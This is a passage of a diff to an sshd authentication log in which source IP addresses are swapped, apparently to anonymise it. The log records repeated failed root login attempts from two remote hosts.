-Feb 22 16:48:04 slave22 sshd[2797]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:48:04 slave22 sshd[2797]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:48:04 slave22 sshd[2797]: PAM service(sshd) ignoring max retries; 5 > 3
 Feb 22 16:48:04 slave22 sshd[2809]: Received disconnect from 69.245.39.97: 11: disconnected by user
 Feb 22 16:48:04 slave22 sshd[2805]: pam_unix(sshd:session): session closed for
user drewr
-Feb 22 16:48:05 slave22 sshd[2801]: Failed password for root from 116.31.116.27 port 50793 ssh2
-Feb 22 16:48:05 slave22 sshd[2801]: Received disconnect from 116.31.116.27: 11: [preauth]
-Feb 22 16:48:05 slave22 sshd[2801]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root
-Feb 22 16:48:08 slave22 sshd[2817]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:48:05 slave22 sshd[2801]: Failed password for root from 216.160.83.58 port 50793 ssh2
+Feb 22 16:48:05 slave22 sshd[2801]: Received disconnect from 216.160.83.58: 11: [preauth]
+Feb 22 16:48:05 slave22 sshd[2801]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root
+Feb 22 16:48:08 slave22 sshd[2817]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root
 Feb 22 16:48:08 slave22 sshd[2817]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:48:10 slave22 sshd[2817]: Failed password for root from 202.109.143.106 port 4450 ssh2
+Feb 22 16:48:10 slave22 sshd[2817]: Failed password for root from 202.196.224.106 port 4450 ssh2
 Feb 22 16:48:10 slave22 sshd[2817]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:48:12 slave22 sshd[2817]: Failed password for root from 202.109.143.106 port 4450 ssh2
+Feb 22 16:48:12 slave22 sshd[2817]: Failed password for root from 202.196.224.106 port 4450 ssh2
 Feb 22 16:48:12 slave22 sshd[2817]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
-Feb 22 16:48:14 slave22 sshd[2817]: Failed password for root from 202.109.143.106 port 4450 ssh2
+Feb 22 16:48:14 slave22 sshd[2817]: Failed password for root from 202.196.224.106 port 4450 ssh2
 Feb 22 16:48:15 slave22 sshd[2817]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user
"root" -Feb 22 16:48:17 slave22 sshd[2817]: Failed password for root from 202.109.143.106 port 4450 ssh2 +Feb 22 16:48:17 slave22 sshd[2817]: Failed password for root from 202.196.224.106 port 4450 ssh2 Feb 22 16:48:17 slave22 sshd[2817]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:19 slave22 sshd[2817]: Failed password for root from 202.109.143.106 port 4450 ssh2 +Feb 22 16:48:19 slave22 sshd[2817]: Failed password for root from 202.196.224.106 port 4450 ssh2 Feb 22 16:48:20 slave22 sshd[2817]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:48:20 slave22 sshd[2817]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:48:20 slave22 sshd[2817]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:48:20 slave22 sshd[2817]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:48:28 slave22 sshd[2821]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:48:28 slave22 sshd[2821]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:48:28 slave22 sshd[2821]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:30 slave22 sshd[2821]: Failed password for root from 202.109.143.106 port 3346 ssh2 +Feb 22 16:48:30 slave22 sshd[2821]: Failed password for root from 202.196.224.106 port 3346 ssh2 Feb 22 16:48:31 slave22 sshd[2821]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:32 slave22 sshd[2821]: Failed password for root from 202.109.143.106 port 3346 ssh2 +Feb 22 16:48:32 slave22 sshd[2821]: Failed password for root from 202.196.224.106 port 3346 ssh2 Feb 22 16:48:33 slave22 sshd[2821]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by 
user "root" -Feb 22 16:48:34 slave22 sshd[2821]: Failed password for root from 202.109.143.106 port 3346 ssh2 +Feb 22 16:48:34 slave22 sshd[2821]: Failed password for root from 202.196.224.106 port 3346 ssh2 Feb 22 16:48:35 slave22 sshd[2821]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:37 slave22 sshd[2821]: Failed password for root from 202.109.143.106 port 3346 ssh2 +Feb 22 16:48:37 slave22 sshd[2821]: Failed password for root from 202.196.224.106 port 3346 ssh2 Feb 22 16:48:37 slave22 sshd[2821]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:39 slave22 sshd[2821]: Failed password for root from 202.109.143.106 port 3346 ssh2 +Feb 22 16:48:39 slave22 sshd[2821]: Failed password for root from 202.196.224.106 port 3346 ssh2 Feb 22 16:48:39 slave22 sshd[2821]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:48:39 slave22 sshd[2821]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:48:39 slave22 sshd[2821]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:48:39 slave22 sshd[2821]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:48:52 slave22 sshd[2825]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 16:48:52 slave22 sshd[2825]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 16:48:52 slave22 sshd[2825]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:53 slave22 sshd[2837]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:48:53 slave22 sshd[2837]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 
user=root Feb 22 16:48:53 slave22 sshd[2837]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:54 slave22 sshd[2825]: Failed password for root from 116.31.116.27 port 30743 ssh2 +Feb 22 16:48:54 slave22 sshd[2825]: Failed password for root from 216.160.83.58 port 30743 ssh2 Feb 22 16:48:54 slave22 sshd[2825]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:55 slave22 sshd[2837]: Failed password for root from 202.109.143.106 port 1074 ssh2 +Feb 22 16:48:55 slave22 sshd[2837]: Failed password for root from 202.196.224.106 port 1074 ssh2 Feb 22 16:48:55 slave22 sshd[2837]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:56 slave22 sshd[2825]: Failed password for root from 116.31.116.27 port 30743 ssh2 -Feb 22 16:48:57 slave22 sshd[2837]: Failed password for root from 202.109.143.106 port 1074 ssh2 +Feb 22 16:48:56 slave22 sshd[2825]: Failed password for root from 216.160.83.58 port 30743 ssh2 +Feb 22 16:48:57 slave22 sshd[2837]: Failed password for root from 202.196.224.106 port 1074 ssh2 Feb 22 16:48:57 slave22 sshd[2825]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:48:57 slave22 sshd[2837]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:48:59 slave22 sshd[2825]: Failed password for root from 116.31.116.27 port 30743 ssh2 -Feb 22 16:48:59 slave22 sshd[2837]: Failed password for root from 202.109.143.106 port 1074 ssh2 +Feb 22 16:48:59 slave22 sshd[2825]: Failed password for root from 216.160.83.58 port 30743 ssh2 +Feb 22 16:48:59 slave22 sshd[2837]: Failed password for root from 202.196.224.106 port 1074 ssh2 Feb 22 16:49:00 slave22 sshd[2837]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:00 slave22 sshd[2825]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 16:49:00 slave22 sshd[2825]: PAM 2 more 
authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root -Feb 22 16:49:02 slave22 sshd[2837]: Failed password for root from 202.109.143.106 port 1074 ssh2 +Feb 22 16:49:00 slave22 sshd[2825]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 16:49:00 slave22 sshd[2825]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root +Feb 22 16:49:02 slave22 sshd[2837]: Failed password for root from 202.196.224.106 port 1074 ssh2 Feb 22 16:49:02 slave22 sshd[2837]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:04 slave22 sshd[2837]: Failed password for root from 202.109.143.106 port 1074 ssh2 +Feb 22 16:49:04 slave22 sshd[2837]: Failed password for root from 202.196.224.106 port 1074 ssh2 Feb 22 16:49:05 slave22 sshd[2837]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:49:05 slave22 sshd[2837]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:49:05 slave22 sshd[2837]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:49:05 slave22 sshd[2837]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:49:07 slave22 sshd[2841]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:49:07 slave22 sshd[2841]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:49:07 slave22 sshd[2841]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:08 slave22 sshd[2841]: Failed password for root from 202.109.143.106 port 4014 ssh2 +Feb 22 16:49:08 slave22 sshd[2841]: Failed password for root from 202.196.224.106 port 4014 ssh2 Feb 22 16:49:09 slave22 sshd[2841]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not 
met by user "root" -Feb 22 16:49:10 slave22 sshd[2841]: Failed password for root from 202.109.143.106 port 4014 ssh2 +Feb 22 16:49:10 slave22 sshd[2841]: Failed password for root from 202.196.224.106 port 4014 ssh2 Feb 22 16:49:11 slave22 sshd[2841]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:13 slave22 sshd[2841]: Failed password for root from 202.109.143.106 port 4014 ssh2 +Feb 22 16:49:13 slave22 sshd[2841]: Failed password for root from 202.196.224.106 port 4014 ssh2 Feb 22 16:49:13 slave22 sshd[2841]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:15 slave22 sshd[2841]: Failed password for root from 202.109.143.106 port 4014 ssh2 +Feb 22 16:49:15 slave22 sshd[2841]: Failed password for root from 202.196.224.106 port 4014 ssh2 Feb 22 16:49:15 slave22 sshd[2841]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:17 slave22 sshd[2841]: Failed password for root from 202.109.143.106 port 4014 ssh2 +Feb 22 16:49:17 slave22 sshd[2841]: Failed password for root from 202.196.224.106 port 4014 ssh2 Feb 22 16:49:17 slave22 sshd[2841]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:49:17 slave22 sshd[2841]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:49:17 slave22 sshd[2841]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:49:17 slave22 sshd[2841]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:49:47 slave22 sshd[2846]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 16:49:47 slave22 sshd[2846]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 16:49:47 slave22 sshd[2846]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not 
met by user "root" -Feb 22 16:49:49 slave22 sshd[2846]: Failed password for root from 116.31.116.27 port 40854 ssh2 +Feb 22 16:49:49 slave22 sshd[2846]: Failed password for root from 216.160.83.58 port 40854 ssh2 Feb 22 16:49:49 slave22 sshd[2846]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:51 slave22 sshd[2846]: Failed password for root from 116.31.116.27 port 40854 ssh2 +Feb 22 16:49:51 slave22 sshd[2846]: Failed password for root from 216.160.83.58 port 40854 ssh2 Feb 22 16:49:51 slave22 sshd[2846]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:49:53 slave22 sshd[2846]: Failed password for root from 116.31.116.27 port 40854 ssh2 -Feb 22 16:49:55 slave22 sshd[2846]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 16:49:55 slave22 sshd[2846]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root -Feb 22 16:50:06 slave22 sshd[2865]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:49:53 slave22 sshd[2846]: Failed password for root from 216.160.83.58 port 40854 ssh2 +Feb 22 16:49:55 slave22 sshd[2846]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 16:49:55 slave22 sshd[2846]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root +Feb 22 16:50:06 slave22 sshd[2865]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:50:06 slave22 sshd[2865]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:08 slave22 sshd[2865]: Failed password for root from 202.109.143.106 port 1208 ssh2 +Feb 22 16:50:08 slave22 sshd[2865]: Failed password for root from 202.196.224.106 port 1208 ssh2 Feb 22 16:50:08 slave22 sshd[2865]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by 
user "root" -Feb 22 16:50:10 slave22 sshd[2865]: Failed password for root from 202.109.143.106 port 1208 ssh2 +Feb 22 16:50:10 slave22 sshd[2865]: Failed password for root from 202.196.224.106 port 1208 ssh2 Feb 22 16:50:10 slave22 sshd[2865]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:13 slave22 sshd[2865]: Failed password for root from 202.109.143.106 port 1208 ssh2 +Feb 22 16:50:13 slave22 sshd[2865]: Failed password for root from 202.196.224.106 port 1208 ssh2 Feb 22 16:50:13 slave22 sshd[2865]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:14 slave22 sshd[2865]: Failed password for root from 202.109.143.106 port 1208 ssh2 +Feb 22 16:50:14 slave22 sshd[2865]: Failed password for root from 202.196.224.106 port 1208 ssh2 Feb 22 16:50:15 slave22 sshd[2865]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:16 slave22 sshd[2865]: Failed password for root from 202.109.143.106 port 1208 ssh2 +Feb 22 16:50:16 slave22 sshd[2865]: Failed password for root from 202.196.224.106 port 1208 ssh2 Feb 22 16:50:17 slave22 sshd[2865]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:50:17 slave22 sshd[2865]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:50:17 slave22 sshd[2865]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:50:17 slave22 sshd[2865]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:50:27 slave22 sshd[2869]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:50:27 slave22 sshd[2869]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:50:27 slave22 sshd[2869]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met 
by user "root" -Feb 22 16:50:29 slave22 sshd[2869]: Failed password for root from 202.109.143.106 port 2112 ssh2 +Feb 22 16:50:29 slave22 sshd[2869]: Failed password for root from 202.196.224.106 port 2112 ssh2 Feb 22 16:50:30 slave22 sshd[2869]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:32 slave22 sshd[2869]: Failed password for root from 202.109.143.106 port 2112 ssh2 +Feb 22 16:50:32 slave22 sshd[2869]: Failed password for root from 202.196.224.106 port 2112 ssh2 Feb 22 16:50:32 slave22 sshd[2869]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:34 slave22 sshd[2869]: Failed password for root from 202.109.143.106 port 2112 ssh2 +Feb 22 16:50:34 slave22 sshd[2869]: Failed password for root from 202.196.224.106 port 2112 ssh2 Feb 22 16:50:34 slave22 sshd[2869]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:37 slave22 sshd[2869]: Failed password for root from 202.109.143.106 port 2112 ssh2 +Feb 22 16:50:37 slave22 sshd[2869]: Failed password for root from 202.196.224.106 port 2112 ssh2 Feb 22 16:50:37 slave22 sshd[2869]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:38 slave22 sshd[2869]: Failed password for root from 202.109.143.106 port 2112 ssh2 +Feb 22 16:50:38 slave22 sshd[2869]: Failed password for root from 202.196.224.106 port 2112 ssh2 Feb 22 16:50:38 slave22 sshd[2869]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:50:38 slave22 sshd[2869]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:50:38 slave22 sshd[2869]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:50:38 slave22 sshd[2869]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:50:42 slave22 sshd[2873]: pam_unix(sshd:auth): authentication failure; 
logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 16:50:42 slave22 sshd[2873]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 16:50:42 slave22 sshd[2873]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:44 slave22 sshd[2873]: Failed password for root from 116.31.116.27 port 33827 ssh2 +Feb 22 16:50:44 slave22 sshd[2873]: Failed password for root from 216.160.83.58 port 33827 ssh2 Feb 22 16:50:46 slave22 sshd[2873]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:48 slave22 sshd[2873]: Failed password for root from 116.31.116.27 port 33827 ssh2 +Feb 22 16:50:48 slave22 sshd[2873]: Failed password for root from 216.160.83.58 port 33827 ssh2 Feb 22 16:50:49 slave22 sshd[2873]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:50:50 slave22 sshd[2873]: Failed password for root from 116.31.116.27 port 33827 ssh2 -Feb 22 16:50:50 slave22 sshd[2873]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 16:50:50 slave22 sshd[2873]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root -Feb 22 16:51:35 slave22 sshd[2885]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 16:50:50 slave22 sshd[2873]: Failed password for root from 216.160.83.58 port 33827 ssh2 +Feb 22 16:50:50 slave22 sshd[2873]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 16:50:50 slave22 sshd[2873]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root +Feb 22 16:51:35 slave22 sshd[2885]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 16:51:35 slave22 sshd[2885]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user 
"root" -Feb 22 16:51:37 slave22 sshd[2885]: Failed password for root from 116.31.116.27 port 22460 ssh2 +Feb 22 16:51:37 slave22 sshd[2885]: Failed password for root from 216.160.83.58 port 22460 ssh2 Feb 22 16:51:37 slave22 sshd[2885]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:51:39 slave22 sshd[2885]: Failed password for root from 116.31.116.27 port 22460 ssh2 +Feb 22 16:51:39 slave22 sshd[2885]: Failed password for root from 216.160.83.58 port 22460 ssh2 Feb 22 16:51:39 slave22 sshd[2885]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:51:41 slave22 sshd[2885]: Failed password for root from 116.31.116.27 port 22460 ssh2 -Feb 22 16:51:42 slave22 sshd[2885]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 16:51:42 slave22 sshd[2885]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root -Feb 22 16:52:07 slave22 sshd[2897]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:51:41 slave22 sshd[2885]: Failed password for root from 216.160.83.58 port 22460 ssh2 +Feb 22 16:51:42 slave22 sshd[2885]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 16:51:42 slave22 sshd[2885]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root +Feb 22 16:52:07 slave22 sshd[2897]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:52:07 slave22 sshd[2897]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:09 slave22 sshd[2897]: Failed password for root from 202.109.143.106 port 4097 ssh2 +Feb 22 16:52:09 slave22 sshd[2897]: Failed password for root from 202.196.224.106 port 4097 ssh2 Feb 22 16:52:09 slave22 sshd[2897]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" 
-Feb 22 16:52:11 slave22 sshd[2897]: Failed password for root from 202.109.143.106 port 4097 ssh2 +Feb 22 16:52:11 slave22 sshd[2897]: Failed password for root from 202.196.224.106 port 4097 ssh2 Feb 22 16:52:11 slave22 sshd[2897]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:14 slave22 sshd[2897]: Failed password for root from 202.109.143.106 port 4097 ssh2 +Feb 22 16:52:14 slave22 sshd[2897]: Failed password for root from 202.196.224.106 port 4097 ssh2 Feb 22 16:52:14 slave22 sshd[2897]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:16 slave22 sshd[2897]: Failed password for root from 202.109.143.106 port 4097 ssh2 +Feb 22 16:52:16 slave22 sshd[2897]: Failed password for root from 202.196.224.106 port 4097 ssh2 Feb 22 16:52:16 slave22 sshd[2897]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:18 slave22 sshd[2897]: Failed password for root from 202.109.143.106 port 4097 ssh2 +Feb 22 16:52:18 slave22 sshd[2897]: Failed password for root from 202.196.224.106 port 4097 ssh2 Feb 22 16:52:19 slave22 sshd[2897]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:52:19 slave22 sshd[2897]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:52:19 slave22 sshd[2897]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:52:19 slave22 sshd[2897]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:52:27 slave22 sshd[2901]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:52:27 slave22 sshd[2901]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:52:27 slave22 sshd[2901]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user 
"root" -Feb 22 16:52:29 slave22 sshd[2901]: Failed password for root from 202.109.143.106 port 3046 ssh2 +Feb 22 16:52:29 slave22 sshd[2901]: Failed password for root from 202.196.224.106 port 3046 ssh2 Feb 22 16:52:29 slave22 sshd[2901]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:32 slave22 sshd[2901]: Failed password for root from 202.109.143.106 port 3046 ssh2 -Feb 22 16:52:32 slave22 sshd[2905]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root +Feb 22 16:52:32 slave22 sshd[2901]: Failed password for root from 202.196.224.106 port 3046 ssh2 +Feb 22 16:52:32 slave22 sshd[2905]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 user=root Feb 22 16:52:32 slave22 sshd[2905]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:52:32 slave22 sshd[2901]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:34 slave22 sshd[2905]: Failed password for root from 116.31.116.27 port 16865 ssh2 -Feb 22 16:52:34 slave22 sshd[2901]: Failed password for root from 202.109.143.106 port 3046 ssh2 +Feb 22 16:52:34 slave22 sshd[2905]: Failed password for root from 216.160.83.58 port 16865 ssh2 +Feb 22 16:52:34 slave22 sshd[2901]: Failed password for root from 202.196.224.106 port 3046 ssh2 Feb 22 16:52:34 slave22 sshd[2901]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" Feb 22 16:52:35 slave22 sshd[2905]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:36 slave22 sshd[2901]: Failed password for root from 202.109.143.106 port 3046 ssh2 +Feb 22 16:52:36 slave22 sshd[2901]: Failed password for root from 202.196.224.106 port 3046 ssh2 Feb 22 16:52:37 slave22 sshd[2901]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:37 slave22 sshd[2905]: Failed 
password for root from 116.31.116.27 port 16865 ssh2 +Feb 22 16:52:37 slave22 sshd[2905]: Failed password for root from 216.160.83.58 port 16865 ssh2 Feb 22 16:52:38 slave22 sshd[2905]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root" -Feb 22 16:52:38 slave22 sshd[2901]: Failed password for root from 202.109.143.106 port 3046 ssh2 +Feb 22 16:52:38 slave22 sshd[2901]: Failed password for root from 202.196.224.106 port 3046 ssh2 Feb 22 16:52:38 slave22 sshd[2901]: fatal: Read from socket failed: Connection reset by peer [preauth] -Feb 22 16:52:38 slave22 sshd[2901]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:52:38 slave22 sshd[2901]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.196.224.106 user=root Feb 22 16:52:38 slave22 sshd[2901]: PAM service(sshd) ignoring max retries; 5 > 3 -Feb 22 16:52:40 slave22 sshd[2905]: Failed password for root from 116.31.116.27 port 16865 ssh2 -Feb 22 16:52:40 slave22 sshd[2905]: Received disconnect from 116.31.116.27: 11: [preauth] -Feb 22 16:52:40 slave22 sshd[2905]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=116.31.116.27 user=root -Feb 22 16:52:45 slave22 sshd[2909]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root +Feb 22 16:52:40 slave22 sshd[2905]: Failed password for root from 216.160.83.58 port 16865 ssh2 +Feb 22 16:52:40 slave22 sshd[2905]: Received disconnect from 216.160.83.58: 11: [preauth] +Feb 22 16:52:40 slave22 sshd[2905]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=216.160.83.58 